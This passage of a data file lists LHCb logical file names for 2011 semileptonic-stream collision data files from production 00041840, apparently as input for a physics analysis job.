'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061974_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006868_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018011_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059937_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063290_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030702_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042868_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062020_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036167_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067774_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016694_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032341_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060617_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053479_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059726_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040210_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009523_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020814_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011349_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069095_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022839_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053873_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021866_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004716_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057952_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016554_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005542_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041461_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038766_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003700_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050702_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010056_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047734_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028141_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032450_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011348_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051461_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010910_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065927_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002874_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061722_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025046_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032689_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067885_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023054_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005594_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054902_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040399_1.semileptonic.dst',
